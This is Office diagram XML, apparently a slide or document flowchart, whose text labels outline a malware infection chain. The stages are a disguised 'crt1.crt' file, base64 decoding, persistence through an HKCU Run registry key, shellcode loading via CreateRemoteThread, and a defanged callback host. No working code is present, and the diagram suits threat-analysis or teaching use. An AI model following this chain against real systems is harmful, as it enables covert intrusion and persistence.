        <a:xfrm>
          <a:off x="578869" y="2174910"/>
          <a:ext cx="2312302" cy="14451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ontserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Decrypt / Install as HKCU </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Run Registry Key</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="621197" y="2217238"/>
        <a:ext cx="2227646" cy="1360533"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="289831" y="1813613"/>
          <a:ext cx="289037" cy="2890378"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="2890378"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="289037" y="28903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CDCCEE-6D47-4AF9-97AF-D303A141EC73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="578869" y="3981396"/>
          <a:ext cx="2312302" cy="14451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ontserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>hxxps://demowarecallback.local</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="621197" y="4023724"/>
        <a:ext cx="2227646" cy="1360533"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C70499B9-9E13-4666-9509-800D713B9607}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3613767" y="368423"/>
          <a:ext cx="2890378" cy="14451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38100" rIns="57150" bIns="38100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1333500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3000" kern="1200">
              <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>crt1.crt</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3656095" y="410751"/>
        <a:ext cx="2805722" cy="1360533"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{660A2F0E-33F3-4940-9D0D-EF5C99F91DD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3902805" y="1813613"/>
          <a:ext cx="289037" cy="1083891"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="1083891"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="289037" y="1083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560B7-D20C-4F28-970C-4812B9C591F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4191843" y="2174910"/>
          <a:ext cx="2312302" cy="14451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ontserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Base64 decode and run</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4234171" y="2217238"/>
        <a:ext cx="2227646" cy="1360533"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3902805" y="1813613"/>
          <a:ext cx="289037" cy="2890378"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="2890378"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="289037" y="28903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4F4A0-6667-4351-9A85-AA0C7736449F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4191843" y="3981396"/>
          <a:ext cx="2312302" cy="14451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Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Load shellcode via CreateRemoteThread</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4234171" y="4023724"/>
        <a:ext cx="2227646" cy="13605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coreProperties>
</file>